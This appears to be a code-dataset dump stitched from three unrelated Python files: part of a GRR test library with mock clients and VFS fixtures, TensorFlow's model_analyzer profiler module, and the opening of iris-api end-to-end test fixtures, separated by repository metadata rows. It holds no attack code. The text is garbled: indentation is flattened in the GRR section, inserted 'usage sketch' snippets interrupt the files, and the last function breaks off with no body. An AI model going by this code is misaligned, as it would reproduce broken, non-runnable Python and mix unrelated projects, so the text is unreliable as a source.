status = rdfvalue.GrrStatus(status=rdfvalue.GrrStatus.ReturnedStatus.OK)
status.cpu_time_used.user_cpu_time = self.responses
status.cpu_time_used.system_cpu_time = self.responses * 2
status.network_bytes_sent = self.responses * 3
# Every "failrate" client does not have this file.
if self.count == self.failrate:
self.count = 0
return [status]
return [response, status]
def TransferBuffer(self, args):
response = rdfvalue.BufferReference(args)
offset = min(args.offset, len(self.data))
response.data = self.data[offset:]
response.length = len(self.data[offset:])
return [response]
def TestHuntHelperWithMultipleMocks(client_mocks, check_flow_errors=False,
token=None):
total_flows = set()
client_mocks = [MockClient(client_id, client_mock, token=token)
for client_id, client_mock in client_mocks.iteritems()]
worker_mock = MockWorker(check_flow_errors=check_flow_errors, token=token)
# Run the clients and worker until nothing changes any more.
while True:
client_processed = 0
for client_mock in client_mocks:
client_processed += client_mock.Next()
flows_run = []
for flow_run in worker_mock.Next():
total_flows.add(flow_run)
flows_run.append(flow_run)
if client_processed == 0 and not flows_run:
break
if check_flow_errors:
CheckFlowErrors(total_flows, token=token)
def TestHuntHelper(client_mock, client_ids, check_flow_errors=False,
token=None):
return TestHuntHelperWithMultipleMocks(
dict([(client_id, client_mock) for client_id in client_ids]),
check_flow_errors=check_flow_errors, token=token)
# Default fixture age is (Mon Mar 26 14:07:13 2012).
FIXTURE_TIME = 1332788833
def FilterFixture(fixture=None, regex="."):
"""Returns a sub fixture by only returning objects which match the regex."""
result = []
regex = re.compile(regex)
if fixture is None:
fixture = client_fixture.VFS
for path, attributes in fixture:
if regex.match(path):
result.append((path, attributes))
return result
def SetLabel(*labels):
"""Sets a label on a function so we can run tests with different types."""
def Decorator(f):
    # Union the new labels with any labels already attached to the method.
    # Methods without any label default to "small" at collection time.
function_labels = getattr(f, "labels", set())
f.labels = function_labels.union(set(labels))
return f
return Decorator
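# Hedged usage sketch (not part of the original module): a hypothetical test
# case showing how SetLabel attaches labels that GRRTestLoader filters on.
# Methods without an explicit label are treated as "small" at collection time.
class _SetLabelExampleTest(unittest.TestCase):
  @SetLabel("large")
  def testExpensiveOperation(self):
    """Collected only when the loader was built with the "large" label."""
    self.assertTrue(True)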
class ClientFixture(object):
"""A tool to create a client fixture.
This will populate the AFF4 object tree in the data store with a mock client
filesystem, including various objects. This allows us to test various
end-to-end aspects (e.g. GUI).
"""
def __init__(self, client_id, token=None, fixture=None, age=None,
**kwargs):
"""Constructor.
Args:
client_id: The unique id for the new client.
token: An instance of access_control.ACLToken security token.
fixture: An optional fixture to install. If not provided we use
client_fixture.VFS.
age: Create the fixture at this timestamp. If None we use FIXTURE_TIME.
**kwargs: Any other parameters which need to be interpolated by the
fixture.
"""
self.args = kwargs
self.token = token
self.age = age or FIXTURE_TIME
self.client_id = rdfvalue.ClientURN(client_id)
self.args["client_id"] = self.client_id.Basename()
self.args["age"] = self.age
self.CreateClientObject(fixture or client_fixture.VFS)
def CreateClientObject(self, vfs_fixture):
"""Make a new client object."""
# Create the fixture at a fixed time.
with Stubber(time, "time", lambda: self.age):
for path, (aff4_type, attributes) in vfs_fixture:
path %= self.args
        # First remove the old fixture just in case it's still there.
data_store.DB.DeleteAttributesRegex(
self.client_id.Add(path), aff4.AFF4_PREFIXES, token=self.token)
aff4_object = aff4.FACTORY.Create(self.client_id.Add(path),
aff4_type, mode="rw",
token=self.token)
for attribute_name, value in attributes.items():
attribute = aff4.Attribute.PREDICATES[attribute_name]
if isinstance(value, (str, unicode)):
# Interpolate the value
value %= self.args
# Is this supposed to be an RDFValue array?
if aff4.issubclass(attribute.attribute_type, rdfvalue.RDFValueArray):
rdfvalue_object = attribute()
for item in value:
new_object = rdfvalue_object.rdf_type.FromTextFormat(
utils.SmartStr(item))
rdfvalue_object.Append(new_object)
# It is a text serialized protobuf.
elif aff4.issubclass(attribute.attribute_type,
rdfvalue.RDFProtoStruct):
# Use the alternate constructor - we always write protobufs in
# textual form:
rdfvalue_object = attribute.attribute_type.FromTextFormat(
utils.SmartStr(value))
else:
rdfvalue_object = attribute(value)
aff4_object.AddAttribute(attribute, rdfvalue_object)
# Make sure we do not actually close the object here - we only want to
# sync back its attributes, not run any finalization code.
aff4_object.Flush()
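# Hedged usage sketch (not part of the original module): install the default
# VFS fixture for a made-up client id before exercising code that reads the
# AFF4 tree. The client id below is a placeholder in the usual GRR format.
def _ExampleClientFixtureUsage(token):
  """Illustrative only: populate client_fixture.VFS for one fake client."""
  ClientFixture("C.1000000000000000", token=token)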
class ClientVFSHandlerFixture(vfs.VFSHandler):
"""A client side VFS handler for the OS type - returns the fixture."""
# A class wide cache for fixtures. Key is the prefix, and value is the
# compiled fixture.
cache = {}
paths = None
supported_pathtype = rdfvalue.PathSpec.PathType.OS
# Do not auto-register.
auto_register = False
# Everything below this prefix is emulated
prefix = "/fs/os"
def __init__(self, base_fd, prefix=None, pathspec=None):
super(ClientVFSHandlerFixture, self).__init__(base_fd, pathspec=pathspec)
self.prefix = self.prefix or prefix
self.pathspec.Append(pathspec)
self.path = self.pathspec.CollapsePath()
self.paths = self.cache.get(self.prefix)
self.PopulateCache()
def PopulateCache(self):
"""Parse the paths from the fixture."""
if self.paths: return
    # The cache is attached to the class so it can be shared by all instances.
self.paths = self.__class__.cache[self.prefix] = {}
for path, (vfs_type, attributes) in client_fixture.VFS:
if not path.startswith(self.prefix): continue
path = utils.NormalizePath(path[len(self.prefix):])
if path == "/":
continue
stat = rdfvalue.StatEntry()
args = {"client_id": "C.1234"}
attrs = attributes.get("aff4:stat")
if attrs:
attrs %= args # Remove any %% and interpolate client_id.
stat = rdfvalue.StatEntry.FromTextFormat(utils.SmartStr(attrs))
stat.pathspec = rdfvalue.PathSpec(pathtype=self.supported_pathtype,
path=path)
# TODO(user): Once we add tests around not crossing device boundaries,
# we need to be smarter here, especially for the root entry.
stat.st_dev = 1
path = self._NormalizeCaseForPath(path, vfs_type)
self.paths[path] = (vfs_type, stat)
self.BuildIntermediateDirectories()
def _NormalizeCaseForPath(self, path, vfs_type):
"""Handle casing differences for different filesystems."""
# Special handling for case sensitivity of registry keys.
    # This mimics the behavior of the operating system.
if self.supported_pathtype == rdfvalue.PathSpec.PathType.REGISTRY:
self.path = self.path.replace("\\", "/")
parts = path.split("/")
if vfs_type == "VFSFile":
      # If it's a file, the last component is a value, which is case sensitive.
lower_parts = [x.lower() for x in parts[0:-1]]
lower_parts.append(parts[-1])
path = utils.Join(*lower_parts)
else:
path = utils.Join(*[x.lower() for x in parts])
return path
def BuildIntermediateDirectories(self):
"""Interpolate intermediate directories based on their children.
    This avoids having to add useless intermediate directories to the
    client fixture.
"""
for dirname, (_, stat) in self.paths.items():
while 1:
dirname = os.path.dirname(dirname)
new_pathspec = stat.pathspec.Copy()
new_pathspec.path = dirname
if dirname == "/" or dirname in self.paths: break
self.paths[dirname] = ("VFSDirectory",
rdfvalue.StatEntry(st_mode=16877,
st_size=1,
st_dev=1,
pathspec=new_pathspec))
def ListFiles(self):
# First return exact matches
for k, (_, stat) in self.paths.items():
dirname = os.path.dirname(k)
if dirname == self._NormalizeCaseForPath(self.path, None):
yield stat
def Read(self, length):
result = self.paths.get(self.path)
if not result:
raise IOError("File not found")
result = result[1] # We just want the stat.
data = ""
if result.HasField("resident"):
data = result.resident
elif result.HasField("registry_type"):
data = utils.SmartStr(result.registry_data.GetValue())
data = data[self.offset:self.offset + length]
self.offset += len(data)
return data
def ListNames(self):
for stat in self.ListFiles():
yield os.path.basename(stat.pathspec.path)
def IsDirectory(self):
return bool(self.ListFiles())
def Stat(self):
"""Get Stat for self.path."""
stat_data = self.paths.get(self._NormalizeCaseForPath(self.path, None))
if (not stat_data and
self.supported_pathtype == rdfvalue.PathSpec.PathType.REGISTRY):
# Check in case it is a registry value. Unfortunately our API doesn't let
# the user specify if they are after a value or a key, so we have to try
# both.
stat_data = self.paths.get(self._NormalizeCaseForPath(self.path,
"VFSFile"))
if stat_data:
return stat_data[1] # Strip the vfs_type.
else:
      # We return some fake data; this makes writing tests easier for some
      # things, but we log a warning for the tester since it is often not what
      # you want.
logging.warn("Fake value for %s under %s", self.path, self.prefix)
return rdfvalue.StatEntry(pathspec=self.pathspec,
st_mode=16877,
st_size=12288,
st_atime=1319796280,
st_dev=1)
class ClientRegistryVFSFixture(ClientVFSHandlerFixture):
"""Special client VFS mock that will emulate the registry."""
prefix = "/registry"
supported_pathtype = rdfvalue.PathSpec.PathType.REGISTRY
class ClientFullVFSFixture(ClientVFSHandlerFixture):
"""Full client VFS mock."""
prefix = "/"
supported_pathtype = rdfvalue.PathSpec.PathType.OS
class GrrTestProgram(unittest.TestProgram):
"""A Unit test program which is compatible with conf based args parsing."""
def __init__(self, labels=None, **kw):
self.labels = labels
# Recreate a new data store each time.
startup.TestInit()
self.setUp()
try:
super(GrrTestProgram, self).__init__(**kw)
finally:
try:
self.tearDown()
except Exception as e: # pylint: disable=broad-except
logging.exception(e)
def setUp(self):
"""Any global initialization goes here."""
def tearDown(self):
"""Global teardown code goes here."""
def parseArgs(self, argv):
"""Delegate arg parsing to the conf subsystem."""
# Give the same behaviour as regular unittest
if not flags.FLAGS.tests:
self.test = self.testLoader.loadTestsFromModule(self.module)
return
self.testNames = flags.FLAGS.tests
self.createTests()
class RemotePDB(pdb.Pdb):
"""A Remote debugger facility.
Place breakpoints in the code using:
test_lib.RemotePDB().set_trace()
  Once the debugger is attached, all remote breakpoints will use the same
  connection.
"""
handle = None
prompt = "RemotePDB>"
def __init__(self):
# Use a global socket for remote debugging.
if RemotePDB.handle is None:
self.ListenForConnection()
pdb.Pdb.__init__(self, stdin=self.handle,
stdout=codecs.getwriter("utf8")(self.handle))
def ListenForConnection(self):
"""Listens and accepts a single connection."""
logging.warn("Remote debugger waiting for connection on %s",
config_lib.CONFIG["Test.remote_pdb_port"])
RemotePDB.old_stdout = sys.stdout
RemotePDB.old_stdin = sys.stdin
RemotePDB.skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
RemotePDB.skt.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
RemotePDB.skt.bind(("127.0.0.1", config_lib.CONFIG["Test.remote_pdb_port"]))
RemotePDB.skt.listen(1)
(clientsocket, address) = RemotePDB.skt.accept()
RemotePDB.handle = clientsocket.makefile("rw", 1)
logging.warn("Received a connection from %s", address)
def main(argv=None):
if argv is None:
argv = sys.argv
print "Running test %s" % argv[0]
GrrTestProgram(argv=argv)
| apache-2.0 | -9,088,753,942,586,523,000 | 30.934976 | 82 | 0.647488 | false |
renyi533/tensorflow | tensorflow/python/profiler/model_analyzer.py | 8 | 15063 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Model Analyzer.
Analyze model, including shape, params, time, memory, structure, etc.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import six
from google.protobuf import message
from tensorflow.core.profiler import tfprof_options_pb2
from tensorflow.core.profiler import tfprof_output_pb2
from tensorflow.python import _pywrap_tfprof as print_mdl
from tensorflow.python.eager import context
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.profiler import option_builder
from tensorflow.python.profiler import tfprof_logger
from tensorflow.python.util.tf_export import tf_export
_DEFAULT_PROFILE_OPTIONS = 0
_DEFAULT_ADVISE_OPTIONS = 0
# The following options are for 'advise' cmd.
# Show all advice.
ALL_ADVICE = {
'ExpensiveOperationChecker': {},
'AcceleratorUtilizationChecker': {},
'JobChecker': {}, # Only available internally.
'OperationChecker': {},
}
def _graph_string(graph):
"""Helper to serialize a graph to string."""
if graph:
return graph.as_graph_def(add_shapes=True).SerializeToString()
else:
return b''
def _build_options(options):
"""Build tfprof.OptionsProto.
Args:
options: A dictionary of options.
Returns:
tfprof.OptionsProto.
"""
opts = tfprof_options_pb2.OptionsProto()
opts.max_depth = options.get('max_depth', 10)
opts.min_bytes = options.get('min_bytes', 0)
opts.min_peak_bytes = options.get('min_peak_bytes', 0)
opts.min_residual_bytes = options.get('min_residual_bytes', 0)
opts.min_output_bytes = options.get('min_output_bytes', 0)
opts.min_micros = options.get('min_micros', 0)
opts.min_accelerator_micros = options.get('min_accelerator_micros', 0)
opts.min_cpu_micros = options.get('min_cpu_micros', 0)
opts.min_params = options.get('min_params', 0)
opts.min_float_ops = options.get('min_float_ops', 0)
opts.min_occurrence = options.get('min_occurrence', 0)
opts.step = options.get('step', -1)
opts.order_by = options.get('order_by', 'name')
for p in options.get('account_type_regexes', []):
opts.account_type_regexes.append(p)
for p in options.get('start_name_regexes', []):
opts.start_name_regexes.append(p)
for p in options.get('trim_name_regexes', []):
opts.trim_name_regexes.append(p)
for p in options.get('show_name_regexes', []):
opts.show_name_regexes.append(p)
for p in options.get('hide_name_regexes', []):
opts.hide_name_regexes.append(p)
opts.account_displayed_op_only = options.get('account_displayed_op_only',
False)
for p in options.get('select', []):
opts.select.append(p)
opts.output = options.get('output', 'stdout')
opts.dump_to_file = options.get('dump_to_file', '')
return opts
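# Hedged illustration (not part of the original module): an options dictionary
# of the shape _build_options() consumes. Omitted keys fall back to the
# defaults applied above; the regex values here are placeholders.
_EXAMPLE_PROFILE_OPTIONS = {
    'max_depth': 4,
    'min_micros': 1000,
    'order_by': 'micros',
    'account_type_regexes': ['.*'],
    'show_name_regexes': ['.*conv.*'],
    'select': ['micros', 'bytes', 'params'],
    'output': 'stdout',
}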
def _build_advisor_options(options):
"""Build tfprof.AdvisorOptionsProto.
Args:
options: A dictionary of options. See ALL_ADVICE example.
Returns:
tfprof.AdvisorOptionsProto.
"""
opts = tfprof_options_pb2.AdvisorOptionsProto()
if options is None:
return opts
for checker, checker_opts in six.iteritems(options):
checker_ops_pb = tfprof_options_pb2.AdvisorOptionsProto.CheckerOption()
for k, v in six.iteritems(checker_opts):
checker_ops_pb[k] = v
opts.checkers[checker].MergeFrom(checker_ops_pb)
return opts
@tf_export(v1=['profiler.Profiler'])
class Profiler(object):
"""TensorFlow multi-step profiler.
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/README.md
```python
Typical use case:
# Currently we are only allowed to create 1 profiler per process.
profiler = Profiler(sess.graph)
for i in xrange(total_steps):
if i % 10000 == 0:
run_meta = tf.compat.v1.RunMetadata()
_ = sess.run(...,
options=tf.compat.v1.RunOptions(
trace_level=tf.RunOptions.FULL_TRACE),
run_metadata=run_meta)
profiler.add_step(i, run_meta)
# Profile the parameters of your model.
profiler.profile_name_scope(options=(option_builder.ProfileOptionBuilder
.trainable_variables_parameter()))
# Or profile the timing of your model operations.
opts = option_builder.ProfileOptionBuilder.time_and_memory()
profiler.profile_operations(options=opts)
# Or you can generate a timeline:
opts = (option_builder.ProfileOptionBuilder(
option_builder.ProfileOptionBuilder.time_and_memory())
.with_step(i)
.with_timeline_output(filename).build())
profiler.profile_graph(options=opts)
else:
_ = sess.run(...)
# Auto detect problems and generate advice.
profiler.advise()
```
"""
def __init__(self, graph=None, op_log=None):
"""Constructor.
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
op_log: optional. tensorflow::tfprof::OpLogProto proto. Used to define
extra op types.
"""
if not graph and not context.executing_eagerly():
graph = ops.get_default_graph()
self._coverage = 0.0
self._graph = graph
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
self._graph, op_log=op_log)
# pylint: enable=protected-access
print_mdl.NewProfiler(
_graph_string(self._graph), op_log.SerializeToString())
def __del__(self):
print_mdl.DeleteProfiler()
def add_step(self, step, run_meta):
"""Add statistics of a step.
Args:
step: int, An id used to group one or more different `run_meta` together.
When profiling with the profile_xxx APIs, user can use the `step`
id in the `options` to profile these `run_meta` together.
run_meta: RunMetadata proto that contains statistics of a session run.
"""
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
self._graph, run_meta=run_meta)
# pylint: enable=protected-access
# TODO(xpan): P1: Better to find the current graph.
self._coverage = print_mdl.AddStep(step, _graph_string(self._graph),
run_meta.SerializeToString(),
op_log.SerializeToString())
def profile_python(self, options):
"""Profile the statistics of the Python codes.
By default, it shows the call stack from root. To avoid
    redundant output, you may use options to filter as below:
options['show_name_regexes'] = ['.*my_code.py.*']
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a MultiGraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('code'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_operations(self, options):
"""Profile the statistics of the Operation types (e.g. MatMul, Conv2D).
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a MultiGraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('op'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_name_scope(self, options):
"""Profile the statistics of graph nodes, organized by name scope.
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a GraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.GraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('scope'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def profile_graph(self, options):
"""Profile the statistics of graph nodes, organized by dataflow graph.
Args:
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
a GraphNodeProto that records the results.
"""
opts = _build_options(options)
tfprof_node = tfprof_output_pb2.GraphNodeProto()
try:
tfprof_node.ParseFromString(
print_mdl.Profile('graph'.encode('utf-8'), opts.SerializeToString()))
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
return tfprof_node
def advise(self, options):
"""Automatically detect problems and generate reports.
Args:
options: A dict of options. See ALL_ADVICE example above.
Returns:
An Advise proto that contains the reports from all checkers.
"""
advise_pb = tfprof_output_pb2.AdviceProto()
opts = _build_advisor_options(options)
advise_pb.ParseFromString(
print_mdl.Profile('advise'.encode('utf-8'), opts.SerializeToString()))
return advise_pb
def serialize_to_string(self):
"""Serialize the ProfileProto to a binary string.
    Users can write it to a file for offline analysis with the tfprof command
    line tool or graphical interface.
Returns:
ProfileProto binary string.
"""
return print_mdl.SerializeToString()
def _write_profile(self, filename):
"""Writes the profile to a file."""
print_mdl.WriteProfile(filename)
@tf_export(v1=['profiler.profile'])
def profile(graph=None,
run_meta=None,
op_log=None,
cmd='scope',
options=_DEFAULT_PROFILE_OPTIONS):
"""Profile model.
Tutorials and examples can be found in:
https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/profiler/g3doc/python_api.md
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
    run_meta: optional tensorflow.RunMetadata proto. It is necessary to
        support run time information profiling, such as time and memory.
    op_log: tensorflow.tfprof.OpLogProto proto. User can assign "types" to
        graph nodes with op_log. "types" allow the user to flexibly group and
        account profiles using options['account_type_regexes'].
cmd: string. Either 'op', 'scope', 'graph' or 'code'.
'op' view organizes profile using operation type. (e.g. MatMul)
'scope' view organizes profile using graph node name scope.
'graph' view organizes profile using graph node inputs/outputs.
'code' view organizes profile using Python call stack.
options: A dict of options. See core/profiler/g3doc/options.md.
Returns:
If cmd is 'scope' or 'graph', returns GraphNodeProto proto.
If cmd is 'op' or 'code', returns MultiGraphNodeProto proto.
Side effect: stdout/file/timeline.json depending on options['output']
"""
if not graph and not context.executing_eagerly():
graph = ops.get_default_graph()
if options == _DEFAULT_PROFILE_OPTIONS:
options = (option_builder.ProfileOptionBuilder
.trainable_variables_parameter())
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
graph, op_log, run_meta, add_trace=cmd == 'code')
# pylint: enable=protected-access
opts = _build_options(options)
run_meta_str = run_meta.SerializeToString() if run_meta else b''
graph_str = _graph_string(graph)
if cmd == 'code' or cmd == 'op':
tfprof_node = tfprof_output_pb2.MultiGraphNodeProto()
ret = print_mdl.PrintModelAnalysis(graph_str, run_meta_str,
op_log.SerializeToString(),
cmd.encode('utf-8'),
opts.SerializeToString())
try:
tfprof_node.ParseFromString(ret)
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
elif cmd == 'graph' or cmd == 'scope':
tfprof_node = tfprof_output_pb2.GraphNodeProto()
ret = print_mdl.PrintModelAnalysis(graph_str, run_meta_str,
op_log.SerializeToString(),
cmd.encode('utf-8'),
opts.SerializeToString())
try:
tfprof_node.ParseFromString(ret)
except message.DecodeError as e:
sys.stderr.write('Cannot parse returned proto: %s.\n' % e)
else:
raise errors.InvalidArgumentError(
None, None, 'unknown cmd: %s\n' % cmd)
return tfprof_node
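# Hedged usage sketch (illustrative only, not part of the public API): the
# usual pairing of profile() with ProfileOptionBuilder for a per-op timing and
# memory view of a single profiled step.
def _example_profile_call(graph, run_meta):
  """Illustrative only: profile one step's per-op time and memory."""
  opts = option_builder.ProfileOptionBuilder.time_and_memory()
  return profile(graph=graph, run_meta=run_meta, cmd='op', options=opts)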
@tf_export(v1=['profiler.advise'])
def advise(graph=None, run_meta=None, options=_DEFAULT_ADVISE_OPTIONS):
"""Auto profile and advise.
Builds profiles and automatically check anomalies of various
aspects. For more details:
https://github.com/tensorflow/tensorflow/tree/master/tensorflow/core/profiler/README.md
Args:
graph: tf.Graph. If None and eager execution is not enabled, use
default graph.
    run_meta: optional tensorflow.RunMetadata proto. It is necessary to
        support run time information profiling, such as time and memory.
options: see ALL_ADVICE example above. Default checks everything.
Returns:
Returns AdviceProto proto
"""
if not graph and not context.executing_eagerly():
graph = ops.get_default_graph()
if options == _DEFAULT_ADVISE_OPTIONS:
options = ALL_ADVICE.copy()
# pylint: disable=protected-access
op_log = tfprof_logger.merge_default_with_oplog(
graph, None, run_meta, add_trace=True)
# pylint: enable=protected-access
run_meta_str = run_meta.SerializeToString() if run_meta else b''
opts = _build_advisor_options(options)
ret = tfprof_output_pb2.AdviceProto()
ret.ParseFromString(
print_mdl.PrintModelAnalysis(
_graph_string(graph), run_meta_str, op_log.SerializeToString(),
'advise'.encode('utf-8'), opts.SerializeToString()))
return ret
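# Hedged usage sketch (illustrative only): run every available checker against
# a profiled step; ALL_ADVICE is the module-level dict defined above.
def _example_advise_call(graph, run_meta):
  """Illustrative only: auto-detect profiling anomalies for one step."""
  return advise(graph=graph, run_meta=run_meta, options=ALL_ADVICE)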
| apache-2.0 | 1,639,094,313,660,654,300 | 34.864286 | 101 | 0.666069 | false |
houqp/iris-api | test/e2etest.py | 1 | 90181 | #!/usr/bin/env python
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
# -*- coding:utf-8 -*-
import pytest
import json
import requests
import copy
import iris.bin.iris_ctl as iris_ctl
from click.testing import CliRunner
import uuid
import socket
server = 'http://localhost:16649/'
sender_address = ('localhost', 2321)
base_url = server + 'v0/'
ui_url = server
sample_db_config = {
'db': {
'conn': {
'str': "%(scheme)s://%(user)s:%(password)s@%(host)s/%(database)s?charset=%(charset)s",
'kwargs': {
'scheme': 'mysql+pymysql',
'user': 'root',
'password': '',
'host': '127.0.0.1',
'database': 'iris',
'charset': 'utf8'}},
'kwargs': {
'pool_recycle': 3600,
'echo': False,
'pool_size': 100,
'max_overflow': 100,
'pool_timeout': 60
}}}
def username_header(username):
return {'X-IRIS-USERNAME': username}
@pytest.fixture(scope='module')
def iris_messages():
'''List of iris messages'''
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('SELECT `id`, `incident_id` FROM `message` WHERE NOT ISNULL(`incident_id`) ORDER BY `id` DESC LIMIT 3')
return [dict(id=id, incident_id=incident_id) for (id, incident_id) in cursor]
@pytest.fixture(scope='module')
def iris_incidents():
'''List of iris incidents'''
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('SELECT `id` FROM `incident` LIMIT 3')
return [dict(id=id) for (id,) in cursor]
@pytest.fixture(scope='module')
def fake_message_id(iris_messages):
'''A sample message ID'''
if iris_messages:
return iris_messages[0]['id']
@pytest.fixture(scope='module')
def fake_batch_id():
'''A sample message batch ID'''
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('SELECT `batch` FROM `message` WHERE NOT ISNULL(`incident_id`) AND NOT ISNULL(`batch`) LIMIT 1')
result = cursor.fetchall()
if not result:
return None
return result[0][0]
@pytest.fixture(scope='module')
def fake_incident_id(iris_messages):
'''ID of incident corresponding to fake_message_id'''
if iris_messages:
return iris_messages[0]['incident_id']
@pytest.fixture(scope='module')
def iris_users():
'''List of all iris users'''
re = requests.get(base_url + 'targets/user')
assert re.status_code == 200
return re.json()
@pytest.fixture(scope='module')
def iris_teams():
'''List of all iris teams'''
re = requests.get(base_url + 'targets/team')
assert re.status_code == 200
return re.json()
@pytest.fixture(scope='module')
def iris_applications():
'''List of all iris applications' metadata'''
re = requests.get(base_url + 'applications')
assert re.status_code == 200
return re.json()
@pytest.fixture(scope='module')
def sample_user(iris_users):
'''First user in our list of iris users whose length is long enough for filtering'''
for user in iris_users:
if len(user) > 2:
return user
@pytest.fixture(scope='module')
def sample_user2(sample_user, iris_users):
'''First user in our list of iris users whose length is long enough for filtering and does not start similarly to sample_user'''
for user in iris_users:
if user != sample_user and len(user) > 2 and not sample_user.startswith(user[:2]):
return user
@pytest.fixture(scope='module')
def sample_admin_user():
    '''Name of an iris user with admin privileges'''
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('SELECT `name` FROM `target` JOIN `user` on `target`.`id` = `user`.`target_id` WHERE `user`.`admin` = TRUE LIMIT 1')
result = cursor.fetchone()
if result:
return result[0]
@pytest.fixture(scope='module')
def sample_team(iris_teams):
'''First team in our list of iris teams whose length is long enough for filtering'''
for team in iris_teams:
if len(team) > 2:
return team
@pytest.fixture(scope='module')
def sample_team2(sample_team, iris_teams):
'''First team in our list of iris teams whose length is long enough for filtering and does not start similarly to sample_team'''
for team in iris_teams:
if team != sample_team and len(team) > 2 and not sample_team.startswith(team[:2]):
return team
@pytest.fixture(scope='module')
def sample_email(sample_user):
'''Email address of sample_user'''
re = requests.get(base_url + 'users/' + sample_user, headers=username_header(sample_user))
assert re.status_code == 200
data = re.json()
return data['contacts']['email']
@pytest.fixture(scope='module')
def sample_phone(sample_user):
    '''Phone number of sample_user'''
re = requests.get(base_url + 'users/' + sample_user, headers=username_header(sample_user))
assert re.status_code == 200
data = re.json()
return data['contacts']['call']
@pytest.fixture(scope='module')
def superuser_application():
    '''Application which should have 'allow_other_app_incidents' set to 1 in the DB, allowing it to create incidents as other applications.
       Should generally be 'iris-frontend' '''
return 'iris-frontend'
@pytest.fixture(scope='module')
def sample_application_name(iris_applications, superuser_application):
'''Name of an application which is not the superuser_application'''
for application in iris_applications:
if application['name'] != superuser_application:
return application['name']
@pytest.fixture(scope='module')
def sample_application_name2(iris_applications, superuser_application, sample_application_name):
'''Name of an application which is neither sample_application_name or superuser_application'''
for application in iris_applications:
if application['name'] not in (superuser_application, sample_application_name):
return application['name']
@pytest.fixture(scope='module')
def sample_template_name(sample_application_name, sample_application_name2):
'''A template which is used by sample_application_name but not sample_application_name2'''
re = requests.get(base_url + 'templates?active=1')
assert re.status_code == 200
templates = re.json()
for template in templates:
re = requests.get(base_url + 'templates/' + template['name'])
assert re.status_code == 200
template_data = re.json()
if sample_application_name in template_data['content'] and sample_application_name2 not in template_data['content']:
return template['name']
@pytest.fixture(scope='module')
def sample_plan_name():
    '''Name of an active iris plan'''
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('SELECT `name` FROM `plan_active` LIMIT 1')
result = cursor.fetchone()
if result:
return result[0]
@pytest.fixture(scope='module')
def sample_mode():
    '''A sample contact mode'''
modes = requests.get(base_url + 'modes').json()
if modes:
return modes[0]
@pytest.fixture(scope='module')
def sample_priority():
''' A sample priority '''
priorities = requests.get(base_url + 'priorities').json()
if priorities:
return priorities[0]['name']
def create_incident_with_message(application, plan, target, mode):
with iris_ctl.db_from_config(sample_db_config) as (conn, cursor):
cursor.execute('''INSERT INTO `incident` (`plan_id`, `created`, `context`, `current_step`, `active`, `application_id`)
VALUES (
(SELECT `plan_id` from `plan_active` WHERE `name` = %(plan)s),
NOW(),
"{}",
0,
TRUE,
(SELECT `id` FROM `application` WHERE `name` = %(application)s)
)''', {'application': application, 'plan': plan})
incident_id = cursor.lastrowid
assert incident_id
cursor.execute('''INSERT INTO `message` (`created`, `application_id`, `target_id`, `priority_id`, `mode_id`, `active`, `incident_id`)
VALUES(
NOW(),
(SELECT `id` FROM `application` WHERE `name` = %(application)s),
(SELECT `id` FROM `target` WHERE `name` = %(target)s),
(SELECT `id` FROM `priority` WHERE `name` = 'low'),
(SELECT `id` FROM `mode` WHERE `name` = %(mode)s),
TRUE,
%(incident_id)s
)''', {'application': application, 'target': target, 'mode': mode, 'incident_id': incident_id})
assert cursor.lastrowid
conn.commit()
return incident_id
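# Hedged illustration (not part of the original test suite): how the helper
# above is typically paired with the fixtures, mirroring the claim tests below.
def _example_incident_roundtrip(sample_application_name, sample_plan_name,
                                sample_user):
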